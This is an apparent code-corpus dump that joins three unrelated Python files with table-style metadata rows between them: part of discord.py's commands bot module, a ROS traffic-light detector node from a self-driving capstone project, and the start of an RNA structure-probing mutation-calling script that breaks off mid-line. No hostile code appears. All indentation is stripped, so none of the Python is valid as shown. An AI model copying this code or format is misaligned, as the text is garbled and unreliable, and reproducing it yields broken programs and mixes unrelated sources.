:func:`.when_mentioned`
"""
def inner(bot, msg):
r = list(prefixes)
r = when_mentioned(bot, msg) + r
return r
return inner
def _is_submodule(parent, child):
return parent == child or child.startswith(parent + ".")
class _DefaultRepr:
def __repr__(self):
return '<default-help-command>'
_default = _DefaultRepr()
class BotBase(GroupMixin):
def __init__(self, command_prefix, help_command=_default, description=None, **options):
super().__init__(**options)
self.command_prefix = command_prefix
self.extra_events = {}
self.__cogs = {}
self.__extensions = {}
self._checks = []
self._check_once = []
self._before_invoke = None
self._after_invoke = None
self._help_command = None
self.description = inspect.cleandoc(description) if description else ''
self.owner_id = options.get('owner_id')
self.owner_ids = options.get('owner_ids', set())
self.strip_after_prefix = options.get('strip_after_prefix', False)
if self.owner_id and self.owner_ids:
raise TypeError('Both owner_id and owner_ids are set.')
if self.owner_ids and not isinstance(self.owner_ids, collections.abc.Collection):
raise TypeError(f'owner_ids must be a collection not {self.owner_ids.__class__!r}')
if help_command is _default:
self.help_command = DefaultHelpCommand()
else:
self.help_command = help_command
# internal helpers
def dispatch(self, event_name, *args, **kwargs):
super().dispatch(event_name, *args, **kwargs)
ev = 'on_' + event_name
for event in self.extra_events.get(ev, []):
self._schedule_event(event, ev, *args, **kwargs)
async def close(self):
for extension in tuple(self.__extensions):
try:
self.unload_extension(extension)
except Exception:
pass
for cog in tuple(self.__cogs):
try:
self.remove_cog(cog)
except Exception:
pass
await super().close()
async def on_command_error(self, context, exception):
"""|coro|
The default command error handler provided by the bot.
By default this prints to :data:`sys.stderr` however it could be
overridden to have a different implementation.
This only fires if you do not specify any listeners for command error.
"""
if self.extra_events.get('on_command_error', None):
return
command = context.command
if command and command.has_error_handler():
return
cog = context.cog
if cog and cog.has_error_handler():
return
print(f'Ignoring exception in command {context.command}:', file=sys.stderr)
traceback.print_exception(type(exception), exception, exception.__traceback__, file=sys.stderr)
# global check registration
def check(self, func):
r"""A decorator that adds a global check to the bot.
A global check is similar to a :func:`.check` that is applied
on a per command basis except it is run before any command checks
have been verified and applies to every command the bot has.
.. note::
This function can either be a regular function or a coroutine.
Similar to a command :func:`.check`\, this takes a single parameter
of type :class:`.Context` and can only raise exceptions inherited from
:exc:`.CommandError`.
Example
---------
.. code-block:: python3
@bot.check
def check_commands(ctx):
return ctx.command.qualified_name in allowed_commands
"""
self.add_check(func)
return func
def add_check(self, func, *, call_once=False):
"""Adds a global check to the bot.
This is the non-decorator interface to :meth:`.check`
and :meth:`.check_once`.
Parameters
-----------
func
The function that was used as a global check.
call_once: :class:`bool`
If the function should only be called once per
:meth:`.invoke` call.
"""
if call_once:
self._check_once.append(func)
else:
self._checks.append(func)
def remove_check(self, func, *, call_once=False):
"""Removes a global check from the bot.
This function is idempotent and will not raise an exception
if the function is not in the global checks.
Parameters
-----------
func
The function to remove from the global checks.
call_once: :class:`bool`
If the function was added with ``call_once=True`` in
the :meth:`.Bot.add_check` call or using :meth:`.check_once`.
"""
l = self._check_once if call_once else self._checks
try:
l.remove(func)
except ValueError:
pass
def check_once(self, func):
r"""A decorator that adds a "call once" global check to the bot.
Unlike regular global checks, this one is called only once
per :meth:`.invoke` call.
Regular global checks are called whenever a command is called
or :meth:`.Command.can_run` is called. This type of check
bypasses that and ensures that it's called only once, even inside
the default help command.
.. note::
When using this function the :class:`.Context` sent to a group subcommand
may only parse the parent command and not the subcommands due to it
being invoked once per :meth:`.Bot.invoke` call.
.. note::
This function can either be a regular function or a coroutine.
Similar to a command :func:`.check`\, this takes a single parameter
of type :class:`.Context` and can only raise exceptions inherited from
:exc:`.CommandError`.
Example
---------
.. code-block:: python3
@bot.check_once
def whitelist(ctx):
return ctx.message.author.id in my_whitelist
"""
self.add_check(func, call_once=True)
return func
async def can_run(self, ctx, *, call_once=False):
data = self._check_once if call_once else self._checks
if len(data) == 0:
return True
return await discord.utils.async_all(f(ctx) for f in data)
async def is_owner(self, user):
"""|coro|
Checks if a :class:`~discord.User` or :class:`~discord.Member` is the owner of
this bot.
If an :attr:`owner_id` is not set, it is fetched automatically
through the use of :meth:`~.Bot.application_info`.
.. versionchanged:: 1.3
The function also checks if the application is team-owned if
:attr:`owner_ids` is not set.
Parameters
-----------
user: :class:`.abc.User`
The user to check for.
Returns
--------
:class:`bool`
Whether the user is the owner.
"""
if self.owner_id:
return user.id == self.owner_id
elif self.owner_ids:
return user.id in self.owner_ids
else:
app = await self.application_info()
if app.team:
self.owner_ids = ids = {m.id for m in app.team.members}
return user.id in ids
else:
self.owner_id = owner_id = app.owner.id
return user.id == owner_id
def before_invoke(self, coro):
"""A decorator that registers a coroutine as a pre-invoke hook.
A pre-invoke hook is called directly before the command is
called. This makes it a useful function to set up database
connections or any type of set up required.
This pre-invoke hook takes a sole parameter, a :class:`.Context`.
.. note::
The :meth:`~.Bot.before_invoke` and :meth:`~.Bot.after_invoke` hooks are
only called if all checks and argument parsing procedures pass
without error. If any check or argument parsing procedures fail
then the hooks are not called.
Parameters
-----------
coro: :ref:`coroutine <coroutine>`
The coroutine to register as the pre-invoke hook.
Raises
-------
TypeError
The coroutine passed is not actually a coroutine.
"""
if not asyncio.iscoroutinefunction(coro):
raise TypeError('The pre-invoke hook must be a coroutine.')
self._before_invoke = coro
return coro
def after_invoke(self, coro):
r"""A decorator that registers a coroutine as a post-invoke hook.
A post-invoke hook is called directly after the command is
called. This makes it a useful function to clean-up database
connections or any type of clean up required.
This post-invoke hook takes a sole parameter, a :class:`.Context`.
.. note::
Similar to :meth:`~.Bot.before_invoke`\, this is not called unless
checks and argument parsing procedures succeed. This hook is,
however, **always** called regardless of the internal command
callback raising an error (i.e. :exc:`.CommandInvokeError`\).
This makes it ideal for clean-up scenarios.
Parameters
-----------
coro: :ref:`coroutine <coroutine>`
The coroutine to register as the post-invoke hook.
Raises
-------
TypeError
The coroutine passed is not actually a coroutine.
"""
if not asyncio.iscoroutinefunction(coro):
raise TypeError('The post-invoke hook must be a coroutine.')
self._after_invoke = coro
return coro
# listener registration
def add_listener(self, func, name=None):
"""The non decorator alternative to :meth:`.listen`.
Parameters
-----------
func: :ref:`coroutine <coroutine>`
The function to call.
name: Optional[:class:`str`]
The name of the event to listen for. Defaults to ``func.__name__``.
Example
--------
.. code-block:: python3
async def on_ready(): pass
async def my_message(message): pass
bot.add_listener(on_ready)
bot.add_listener(my_message, 'on_message')
"""
name = func.__name__ if name is None else name
if not asyncio.iscoroutinefunction(func):
raise TypeError('Listeners must be coroutines')
if name in self.extra_events:
self.extra_events[name].append(func)
else:
self.extra_events[name] = [func]
def remove_listener(self, func, name=None):
"""Removes a listener from the pool of listeners.
Parameters
-----------
func
The function that was used as a listener to remove.
name: :class:`str`
The name of the event we want to remove. Defaults to
``func.__name__``.
"""
name = func.__name__ if name is None else name
if name in self.extra_events:
try:
self.extra_events[name].remove(func)
except ValueError:
pass
def listen(self, name=None):
"""A decorator that registers another function as an external
event listener. Basically this allows you to listen to multiple
events from different places e.g. such as :func:`.on_ready`
The functions being listened to must be a :ref:`coroutine <coroutine>`.
Example
--------
.. code-block:: python3
@bot.listen()
async def on_message(message):
print('one')
# in some other file...
@bot.listen('on_message')
async def my_message(message):
print('two')
Would print one and two in an unspecified order.
Raises
-------
TypeError
The function being listened to is not a coroutine.
"""
def decorator(func):
self.add_listener(func, name)
return func
return decorator
# cogs
def add_cog(self, cog: Cog, *, override: bool = False) -> None:
"""Adds a "cog" to the bot.
A cog is a class that has its own event listeners and commands.
.. versionchanged:: 2.0
:exc:`.ClientException` is raised when a cog with the same name
is already loaded.
Parameters
-----------
cog: :class:`.Cog`
The cog to register to the bot.
override: :class:`bool`
If a previously loaded cog with the same name should be ejected
instead of raising an error.
.. versionadded:: 2.0
Raises
-------
TypeError
The cog does not inherit from :class:`.Cog`.
CommandError
An error happened during loading.
.ClientException
A cog with the same name is already loaded.
"""
if not isinstance(cog, Cog):
raise TypeError('cogs must derive from Cog')
cog_name = cog.__cog_name__
existing = self.__cogs.get(cog_name)
if existing is not None:
if not override:
raise discord.ClientException(f'Cog named {cog_name!r} already loaded')
self.remove_cog(cog_name)
cog = cog._inject(self)
self.__cogs[cog_name] = cog
def get_cog(self, name):
"""Gets the cog instance requested.
If the cog is not found, ``None`` is returned instead.
Parameters
-----------
name: :class:`str`
The name of the cog you are requesting.
This is equivalent to the name passed via keyword
argument in class creation or the class name if unspecified.
Returns
--------
Optional[:class:`Cog`]
The cog that was requested. If not found, returns ``None``.
"""
return self.__cogs.get(name)
def remove_cog(self, name):
"""Removes a cog from the bot.
All registered commands and event listeners that the
cog has registered will be removed as well.
If no cog is found then this method has no effect.
Parameters
-----------
name: :class:`str`
The name of the cog to remove.
"""
cog = self.__cogs.pop(name, None)
if cog is None:
return
help_command = self._help_command
if help_command and help_command.cog is cog:
help_command.cog = None
cog._eject(self)
@property
def cogs(self):
"""Mapping[:class:`str`, :class:`Cog`]: A read-only mapping of cog name to cog."""
return types.MappingProxyType(self.__cogs)
# extensions
def _remove_module_references(self, name):
# find all references to the module
# remove the cogs registered from the module
for cogname, cog in self.__cogs.copy().items():
if _is_submodule(name, cog.__module__):
self.remove_cog(cogname)
# remove all the commands from the module
for cmd in self.all_commands.copy().values():
if cmd.module is not None and _is_submodule(name, cmd.module):
if isinstance(cmd, GroupMixin):
cmd.recursively_remove_all_commands()
self.remove_command(cmd.name)
# remove all the listeners from the module
for event_list in self.extra_events.copy().values():
remove = []
for index, event in enumerate(event_list):
if event.__module__ is not None and _is_submodule(name, event.__module__):
remove.append(index)
for index in reversed(remove):
del event_list[index]
def _call_module_finalizers(self, lib, key):
try:
func = getattr(lib, 'teardown')
except AttributeError:
pass
else:
try:
func(self)
except Exception:
pass
finally:
self.__extensions.pop(key, None)
sys.modules.pop(key, None)
name = lib.__name__
for module in list(sys.modules.keys()):
if _is_submodule(name, module):
del sys.modules[module]
def _load_from_module_spec(self, spec, key):
# precondition: key not in self.__extensions
lib = importlib.util.module_from_spec(spec)
sys.modules[key] = lib
try:
spec.loader.exec_module(lib)
except Exception as e:
del sys.modules[key]
raise errors.ExtensionFailed(key, e) from e
try:
setup = getattr(lib, 'setup')
except AttributeError:
del sys.modules[key]
raise errors.NoEntryPointError(key)
try:
setup(self)
except Exception as e:
del sys.modules[key]
self._remove_module_references(lib.__name__)
self._call_module_finalizers(lib, key)
raise errors.ExtensionFailed(key, e) from e
else:
self.__extensions[key] = lib
def _resolve_name(self, name, package):
try:
return importlib.util.resolve_name(name, package)
except ImportError:
raise errors.ExtensionNotFound(name)
def load_extension(self, name, *, package=None):
"""Loads an extension.
An extension is a python module that contains commands, cogs, or
listeners.
An extension must have a global function, ``setup`` defined as
the entry point on what to do when the extension is loaded. This entry
point must have a single argument, the ``bot``.
Parameters
------------
name: :class:`str`
The extension name to load. It must be dot separated like
regular Python imports if accessing a sub-module. e.g.
``foo.test`` if you want to import ``foo/test.py``.
package: Optional[:class:`str`]
The package name to resolve relative imports with.
This is required when loading an extension using a relative path, e.g ``.foo.test``.
Defaults to ``None``.
.. versionadded:: 1.7
Raises
--------
ExtensionNotFound
The extension could not be imported.
This is also raised if the name of the extension could not
be resolved using the provided ``package`` parameter.
ExtensionAlreadyLoaded
The extension is already loaded.
NoEntryPointError
The extension does not have a setup function.
ExtensionFailed
The extension or its setup function had an execution error.
"""
name = self._resolve_name(name, package)
if name in self.__extensions:
raise errors.ExtensionAlreadyLoaded(name)
spec = importlib.util.find_spec(name)
if spec is None:
raise errors.ExtensionNotFound(name)
self._load_from_module_spec(spec, name)
def unload_extension(self, name, *, package=None):
"""Unloads an extension.
When the extension is unloaded, all commands, listeners, and cogs are
removed from the bot and the module is un-imported.
The extension can provide an optional global function, ``teardown``,
to do miscellaneous clean-up if necessary. This function takes a single
parameter, the ``bot``, similar to ``setup`` from
:meth:`~.Bot.load_extension`.
Parameters
------------
name: :class:`str`
The extension name to unload. It must be dot separated like
regular Python imports if accessing a sub-module. e.g.
``foo.test`` if you want to import ``foo/test.py``.
package: Optional[:class:`str`]
The package name to resolve relative imports with.
This is required when unloading an extension using a relative path, e.g ``.foo.test``.
Defaults to ``None``.
.. versionadded:: 1.7
Raises
-------
ExtensionNotFound
The name of the extension could not
be resolved using the provided ``package`` parameter.
ExtensionNotLoaded
The extension was not loaded.
"""
name = self._resolve_name(name, package)
lib = self.__extensions.get(name)
if lib is None:
raise errors.ExtensionNotLoaded(name)
self._remove_module_references(lib.__name__)
self._call_module_finalizers(lib, name)
def reload_extension(self, name, *, package=None):
"""Atomically reloads an extension.
This replaces the extension with the same extension, only refreshed. This is
equivalent to a :meth:`unload_extension` followed by a :meth:`load_extension`
except done in an atomic way. That is, if an operation fails mid-reload then
the bot will roll-back to the prior working state.
Parameters
------------
name: :class:`str`
The extension name to reload. It must be dot separated like
regular Python imports if accessing a sub-module. e.g.
``foo.test`` if you want to import ``foo/test.py``.
package: Optional[:class:`str`]
The package name to resolve relative imports with.
This is required when reloading an extension using a relative path, e.g ``.foo.test``.
Defaults to ``None``.
.. versionadded:: 1.7
Raises
-------
ExtensionNotLoaded
The extension was not loaded.
ExtensionNotFound
The extension could not be imported.
This is also raised if the name of the extension could not
be resolved using the provided ``package`` parameter.
NoEntryPointError
The extension does not have a setup function.
ExtensionFailed
The extension setup function had an execution error.
"""
name = self._resolve_name(name, package)
lib = self.__extensions.get(name)
if lib is None:
raise errors.ExtensionNotLoaded(name)
# get the previous module states from sys modules
modules = {
name: module
for name, module in sys.modules.items()
if _is_submodule(lib.__name__, name)
}
try:
# Unload and then load the module...
self._remove_module_references(lib.__name__)
self._call_module_finalizers(lib, name)
self.load_extension(name)
except Exception:
# if the load failed, the remnants should have been
# cleaned from the load_extension function call
# so let's load it from our old compiled library.
lib.setup(self)
self.__extensions[name] = lib
# revert sys.modules back to normal and raise back to caller
sys.modules.update(modules)
raise
@property
def extensions(self):
"""Mapping[:class:`str`, :class:`py:types.ModuleType`]: A read-only mapping of extension name to extension."""
return types.MappingProxyType(self.__extensions)
# help command stuff
@property
def help_command(self):
return self._help_command
@help_command.setter
def help_command(self, value):
if value is not None:
if not isinstance(value, HelpCommand):
raise TypeError('help_command must be a subclass of HelpCommand')
if self._help_command is not None:
self._help_command._remove_from_bot(self)
self._help_command = value
value._add_to_bot(self)
elif self._help_command is not None:
self._help_command._remove_from_bot(self)
self._help_command = None
else:
self._help_command = None
# command processing
async def get_prefix(self, message):
"""|coro|
Retrieves the prefix the bot is listening to
with the message as a context.
Parameters
-----------
message: :class:`discord.Message`
The message context to get the prefix of.
Returns
--------
Union[List[:class:`str`], :class:`str`]
A list of prefixes or a single prefix that the bot is
listening for.
"""
prefix = ret = self.command_prefix
if callable(prefix):
ret = await discord.utils.maybe_coroutine(prefix, self, message)
if not isinstance(ret, str):
try:
ret = list(ret)
except TypeError:
# It's possible that a generator raised this exception. Don't
# replace it with our own error if that's the case.
if isinstance(ret, collections.abc.Iterable):
raise
raise TypeError("command_prefix must be plain string, iterable of strings, or callable "
f"returning either of these, not {ret.__class__.__name__}")
if not ret:
raise ValueError("Iterable command_prefix must contain at least one prefix")
return ret
async def get_context(self, message, *, cls=Context):
r"""|coro|
Returns the invocation context from the message.
This is a more low-level counter-part for :meth:`.process_commands`
to allow users more fine grained control over the processing.
The returned context is not guaranteed to be a valid invocation
context, :attr:`.Context.valid` must be checked to make sure it is.
If the context is not valid then it is not a valid candidate to be
invoked under :meth:`~.Bot.invoke`.
Parameters
-----------
message: :class:`discord.Message`
The message to get the invocation context from.
cls
The factory class that will be used to create the context.
By default, this is :class:`.Context`. Should a custom
class be provided, it must be similar enough to :class:`.Context`\'s
interface.
Returns
--------
:class:`.Context`
The invocation context. The type of this can change via the
``cls`` parameter.
"""
view = StringView(message.content)
ctx = cls(prefix=None, view=view, bot=self, message=message)
if message.author.id == self.user.id:
return ctx
prefix = await self.get_prefix(message)
invoked_prefix = prefix
if isinstance(prefix, str):
if not view.skip_string(prefix):
return ctx
else:
try:
# if the context class' __init__ consumes something from the view this
# will be wrong. That seems unreasonable though.
if message.content.startswith(tuple(prefix)):
invoked_prefix = discord.utils.find(view.skip_string, prefix)
else:
return ctx
except TypeError:
if not isinstance(prefix, list):
raise TypeError("get_prefix must return either a string or a list of string, "
f"not {prefix.__class__.__name__}")
# It's possible a bad command_prefix got us here.
for value in prefix:
if not isinstance(value, str):
raise TypeError("Iterable command_prefix or list returned from get_prefix must "
f"contain only strings, not {value.__class__.__name__}")
# Getting here shouldn't happen
raise
if self.strip_after_prefix:
view.skip_ws()
invoker = view.get_word()
ctx.invoked_with = invoker
ctx.prefix = invoked_prefix
ctx.command = self.all_commands.get(invoker)
return ctx
async def invoke(self, ctx):
"""|coro|
Invokes the command given under the invocation context and
handles all the internal event dispatch mechanisms.
Parameters
-----------
ctx: :class:`.Context`
The invocation context to invoke.
"""
if ctx.command is not None:
self.dispatch('command', ctx)
try:
if await self.can_run(ctx, call_once=True):
await ctx.command.invoke(ctx)
else:
raise errors.CheckFailure('The global check once functions failed.')
except errors.CommandError as exc:
await ctx.command.dispatch_error(ctx, exc)
else:
self.dispatch('command_completion', ctx)
elif ctx.invoked_with:
exc = errors.CommandNotFound(f'Command "{ctx.invoked_with}" is not found')
self.dispatch('command_error', ctx, exc)
async def process_commands(self, message):
"""|coro|
This function processes the commands that have been registered
to the bot and other groups. Without this coroutine, none of the
commands will be triggered.
By default, this coroutine is called inside the :func:`.on_message`
event. If you choose to override the :func:`.on_message` event, then
you should invoke this coroutine as well.
This is built using other low level tools, and is equivalent to a
call to :meth:`~.Bot.get_context` followed by a call to :meth:`~.Bot.invoke`.
This also checks if the message's author is a bot and doesn't
call :meth:`~.Bot.get_context` or :meth:`~.Bot.invoke` if so.
Parameters
-----------
message: :class:`discord.Message`
The message to process commands for.
"""
if message.author.bot:
return
ctx = await self.get_context(message)
await self.invoke(ctx)
async def on_message(self, message):
await self.process_commands(message)
class Bot(BotBase, discord.Client):
"""Represents a discord bot.
This class is a subclass of :class:`discord.Client` and as a result
anything that you can do with a :class:`discord.Client` you can do with
this bot.
This class also subclasses :class:`.GroupMixin` to provide the functionality
to manage commands.
Attributes
-----------
command_prefix
The command prefix is what the message content must contain initially
to have a command invoked. This prefix could either be a string to
indicate what the prefix should be, or a callable that takes in the bot
as its first parameter and :class:`discord.Message` as its second
parameter and returns the prefix. This is to facilitate "dynamic"
command prefixes. This callable can be either a regular function or
a coroutine.
An empty string as the prefix always matches, enabling prefix-less
command invocation. While this may be useful in DMs it should be avoided
in servers, as it's likely to cause performance issues and unintended
command invocations.
The command prefix could also be an iterable of strings indicating that
multiple checks for the prefix should be used and the first one to
match will be the invocation prefix. You can get this prefix via
:attr:`.Context.prefix`. To avoid confusion empty iterables are not
allowed.
.. note::
When passing multiple prefixes be careful to not pass a prefix
that matches a longer prefix occurring later in the sequence. For
example, if the command prefix is ``('!', '!?')`` the ``'!?'``
prefix will never be matched to any message as the previous one
matches messages starting with ``!?``. This is especially important
when passing an empty string, it should always be last as no prefix
after it will be matched.
case_insensitive: :class:`bool`
Whether the commands should be case insensitive. Defaults to ``False``. This
attribute does not carry over to groups. You must set it to every group if
you require group commands to be case insensitive as well.
description: :class:`str`
The content prefixed into the default help message.
help_command: Optional[:class:`.HelpCommand`]
The help command implementation to use. This can be dynamically
set at runtime. To remove the help command pass ``None``. For more
information on implementing a help command, see :ref:`ext_commands_help_command`.
owner_id: Optional[:class:`int`]
The user ID that owns the bot. If this is not set and is then queried via
:meth:`.is_owner` then it is fetched automatically using
:meth:`~.Bot.application_info`.
owner_ids: Optional[Collection[:class:`int`]]
The user IDs that owns the bot. This is similar to :attr:`owner_id`.
If this is not set and the application is team based, then it is
fetched automatically using :meth:`~.Bot.application_info`.
For performance reasons it is recommended to use a :class:`set`
for the collection. You cannot set both ``owner_id`` and ``owner_ids``.
.. versionadded:: 1.3
strip_after_prefix: :class:`bool`
Whether to strip whitespace characters after encountering the command
prefix. This allows for ``! hello`` and ``!hello`` to both work if
the ``command_prefix`` is set to ``!``. Defaults to ``False``.
.. versionadded:: 1.7
"""
pass
class AutoShardedBot(BotBase, discord.AutoShardedClient):
"""This is similar to :class:`.Bot` except that it is inherited from
:class:`discord.AutoShardedClient` instead.
"""
pass
| 34.321594 | 118 | 0.604245 |
a4a89712613ffd58bba52e5e6019655b39976691 | 6,330 | py | Python | ros/src/tl_detector/tl_detector.py | AlexanderKim/CarND-Capstone | 99d7fb010bba961fe5f9416b6232e9904b8b691d | [
"MIT"
] | null | null | null | ros/src/tl_detector/tl_detector.py | AlexanderKim/CarND-Capstone | 99d7fb010bba961fe5f9416b6232e9904b8b691d | [
"MIT"
] | null | null | null | ros/src/tl_detector/tl_detector.py | AlexanderKim/CarND-Capstone | 99d7fb010bba961fe5f9416b6232e9904b8b691d | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import rospy
from std_msgs.msg import Int32
from geometry_msgs.msg import PoseStamped, Pose
from styx_msgs.msg import TrafficLightArray, TrafficLight
from styx_msgs.msg import Lane
from sensor_msgs.msg import Image
from cv_bridge import CvBridge
from light_classification.tl_classifier import TLClassifier
import tf
import cv2
import yaml
from scipy.spatial import KDTree
STATE_COUNT_THRESHOLD = 3
class TLDetector(object):
def __init__(self):
rospy.init_node('tl_detector')
self.pose = None
self.waypoints = None
self.camera_image = None
self.lights = []
self.waypoints_2d = None
self.waypoint_tree = None
sub1 = rospy.Subscriber('/current_pose', PoseStamped, self.pose_cb)
sub2 = rospy.Subscriber('/base_waypoints', Lane, self.waypoints_cb)
'''
/vehicle/traffic_lights provides you with the location of the traffic light in 3D map space and
helps you acquire an accurate ground truth data source for the traffic light
classifier by sending the current color state of all traffic lights in the
simulator. When testing on the vehicle, the color state will not be available. You'll need to
rely on the position of the light and the camera image to predict it.
'''
sub3 = rospy.Subscriber('/vehicle/traffic_lights', TrafficLightArray, self.traffic_cb)
sub6 = rospy.Subscriber('/image_color', Image, self.image_cb)
config_string = rospy.get_param("/traffic_light_config")
self.config = yaml.load(config_string)
self.upcoming_red_light_pub = rospy.Publisher('/traffic_waypoint', Int32, queue_size=1)
self.bridge = CvBridge()
self.light_classifier = TLClassifier()
self.listener = tf.TransformListener()
self.state = TrafficLight.UNKNOWN
self.last_state = TrafficLight.UNKNOWN
self.last_wp = -1
self.state_count = 0
rospy.spin()
def pose_cb(self, msg):
self.pose = msg
def waypoints_cb(self, waypoints):
self.waypoints = waypoints
if not self.waypoints_2d:
self.waypoints_2d = [[waypoint.pose.pose.position.x, waypoint.pose.pose.position.y] for waypoint in waypoints.waypoints]
self.waypoint_tree = KDTree(self.waypoints_2d)
def traffic_cb(self, msg):
self.lights = msg.lights
def image_cb(self, msg):
"""Identifies red lights in the incoming camera image and publishes the index
of the waypoint closest to the red light's stop line to /traffic_waypoint
Args:
msg (Image): image from car-mounted camera
"""
self.has_image = True
self.camera_image = msg
light_wp, state = self.process_traffic_lights()
'''
Publish upcoming red lights at camera frequency.
Each predicted state has to occur `STATE_COUNT_THRESHOLD` number
of times till we start using it. Otherwise the previous stable state is
used.
'''
if self.state != state:
self.state_count = 0
self.state = state
elif self.state_count >= STATE_COUNT_THRESHOLD:
self.last_state = self.state
light_wp = light_wp if state == TrafficLight.RED else -1
self.last_wp = light_wp
self.upcoming_red_light_pub.publish(Int32(light_wp))
else:
self.upcoming_red_light_pub.publish(Int32(self.last_wp))
self.state_count += 1
# def get_closest_waypoint(self, pose):
def get_closest_waypoint(self, x, y):
"""Identifies the closest path waypoint to the given position
https://en.wikipedia.org/wiki/Closest_pair_of_points_problem
Args:
pose (Pose): position to match a waypoint to
Returns:
int: index of the closest waypoint in self.waypoints
"""
#TODO implement
closest_idx = self.waypoint_tree.query([x, y], 1)[1]
return closest_idx
def get_light_state(self, light):
"""Determines the current color of the traffic light
Args:
light (TrafficLight): light to classify
Returns:
int: ID of traffic light color (specified in styx_msgs/TrafficLight)
"""
if(not self.has_image):
self.prev_light_loc = None
return False
# cv_image = self.bridge.imgmsg_to_cv2(self.camera_image, "bgr8")
cv_image = self.bridge.imgmsg_to_cv2(self.camera_image, "rgb8")
#Get classification
return self.light_classifier.get_classification(cv_image)
def process_traffic_lights(self):
"""Finds closest visible traffic light, if one exists, and determines its
location and color
Returns:
int: index of waypoint closes to the upcoming stop line for a traffic light (-1 if none exists)
int: ID of traffic light color (specified in styx_msgs/TrafficLight)
"""
# light = None
closest_light = None
line_wp_idx = None
# List of positions that correspond to the line to stop in front of for a given intersection
stop_line_positions = self.config['stop_line_positions']
if(self.pose):
# car_position = self.get_closest_waypoint(self.pose.pose)
car_wp_idx = self.get_closest_waypoint(self.pose.pose.position.x, self.pose.pose.position.y)
#TODO find the closest visible traffic light (if one exists)
diff = len(self.waypoints.waypoints)
for i, light in enumerate(self.lights):
line = stop_line_positions[i]
temp_wp_idx = self.get_closest_waypoint(line[0], line[1])
d = temp_wp_idx - car_wp_idx
if d >=0 and d < diff:
diff = d
closest_light = light
line_wp_idx = temp_wp_idx
if closest_light:
state = self.get_light_state(closest_light)
return line_wp_idx, state
# self.waypoints = None
return -1, TrafficLight.UNKNOWN
if __name__ == '__main__':
try:
TLDetector()
except rospy.ROSInterruptException:
rospy.logerr('Could not start traffic node.')
| 34.78022 | 132 | 0.646445 |
501bea0132eb447a696bd18bf9755ba4442090c0 | 7,734 | py | Python | Figure_S1/Figure S1i-Compare with DMS-MaPseq/2-callMutations.py | zhangqf-lab/RIP-icSHAPE-MaP | 435cc8c8d5c2a662edb6371fd228174b3edd996f | [
"MIT"
] | 3 | 2021-06-11T14:17:04.000Z | 2021-12-20T16:20:20.000Z | Figure_S1/Figure S1i-Compare with DMS-MaPseq/2-callMutations.py | zhangqf-lab/RIP-icSHAPE-MaP | 435cc8c8d5c2a662edb6371fd228174b3edd996f | [
"MIT"
] | null | null | null | Figure_S1/Figure S1i-Compare with DMS-MaPseq/2-callMutations.py | zhangqf-lab/RIP-icSHAPE-MaP | 435cc8c8d5c2a662edb6371fd228174b3edd996f | [
"MIT"
] | null | null | null |
##### Run lpd lpdir envpy3 first
import subprocess
import threading
import os
def get_pairs():
pairs = []
pairs.append( [ 'NAI_100mm_vivo_CIRL_SSII', 'DMSO_CIRL_SSII', 'DC_CIRL_SSII' ] )
pairs.append( [ 'NAI_100mm_vitro_CIRL_SSII', 'DMSO_CIRL_SSII', 'DC_CIRL_SSII' ] )
pairs.append( [ 'NAI_100mm_vivo_SMR_SSII_repX', 'DMSO_SMR_SSII_repX', 'DC_SMR_SSII_repX' ] )
pairs.append( [ 'NAI_100mm_vitro_SMR_SSII_repX', 'DMSO_SMR_SSII_repX', 'DC_SMR_SSII_repX' ] )
pairs.append( [ 'NAI_200mm_vitro_SMR_BENR_SSII', 'DMSO_SMR_BENR_SSII' ] )
pairs.append( [ 'NAI_100mm_vitro_SMR_CENR_SSII', 'DMSO_SMR_BENR_SSII' ] )
pairs.append( [ 'NAI_100mm_vitro_SMR_BENR_SSII', 'DMSO_SMR_BENR_SSII' ] )
pairs.append( [ 'NAI_50mm_exvivo_dicer_1_CIRL_CENR_SSII_repX', 'DMSO_dicer_1_CIRL_BENR_SSII_repX', 'DC_dicer_CIRL_CENR_SSII_repX' ] )
pairs.append( [ 'NAI_50mm_exvivo_dicer_2_CIRL_CENR_SSII_repX', 'DMSO_dicer_2_CIRL_BENR_SSII_repX', 'DC_dicer_CIRL_CENR_SSII_repX' ] )
pairs.append( [ 'NAI_100mm_vivo_CIRL_CENR_SSII_repX', 'DMSO_CIRL_BENR_SSII', 'DC_CIRL_CENR_SSII' ] )
pairs.append( [ 'NAI_100mm_vivo_CIRL_TGIII', 'DMSO_CIRL_TGIII', 'DC_CIRL_TGIII' ] )
pairs.append( [ 'NAI_100mm_vitro_CIRL_TGIII', 'DMSO_CIRL_TGIII', 'DC_CIRL_TGIII' ] )
pairs.append( [ 'NAI_100mm_vitro_CIRL_CENR_SSII_repX', 'DMSO_CIRL_BENR_SSII', 'DC_CIRL_CENR_SSII' ] )
pairs.append( [ 'NAI_100mm_vitro_SMR_TGIII', 'DMSO_SMR_TGIII' ] )
pairs.append( [ 'NAI_200mm_vitro_SMR_TGIII', 'DMSO_SMR_TGIII' ] )
opt = {}
for triplet in pairs:
opt[ triplet[0] ] = { 'DMSO':triplet[1], 'DC':None }
if len(triplet) == 3:
opt[ triplet[0] ][ 'DC' ] = triplet[2]
return opt
def format_pairs(file_list):
opt = get_pairs()
construct_pairs = []
NAI_samples = [ file for file in file_list if file.startswith("NAI") ]
for NAI_file in NAI_samples:
necfiles = opt[NAI_file]
if necfiles['DMSO'] in file_list:
if necfiles['DC'] in file_list:
construct_pairs.append( [necfiles['DMSO'], NAI_file, necfiles['DC']] )
else:
construct_pairs.append( [necfiles['DMSO'], NAI_file] )
return construct_pairs
def load_fasta(seqFn, rem_tVersion=False):
Fasta = {}
cur_tid = ''
for line in open(seqFn):
if line[0] == '>':
cur_tid = line[1:].split()[0]
if rem_tVersion and '.' in cur_tid:
cur_tid = ".".join(cur_tid.split(".")[:-1])
Fasta[ cur_tid ] = ''
else:
Fasta[ cur_tid ] += line.strip()
return Fasta
class MakeReacProfClass(threading.Thread):
def __init__(self, inDir, outDir, seqFn, folderList, file_filter=None, mindepth=5000, maxbg=0.05, steps_to_run=[1,2,3]):
threading.Thread.__init__(self)
self.inDir = inDir
self.outDir = outDir
self.seqFn = seqFn
self.folderList = folderList[:]
self.file_filter = set(file_filter[:])
self.mindepth = mindepth
self.maxbg = maxbg
self.steps_to_run = steps_to_run[:]
def run(self):
inDir = self.inDir.rstrip('/') + '/'
outDir = self.outDir.rstrip('/') + '/'
sequence = load_fasta(self.seqFn)
cmd1 = "shapemapper_mutation_counter -i %s -s -c %s -n %s 2>/dev/null 1>/dev/null"
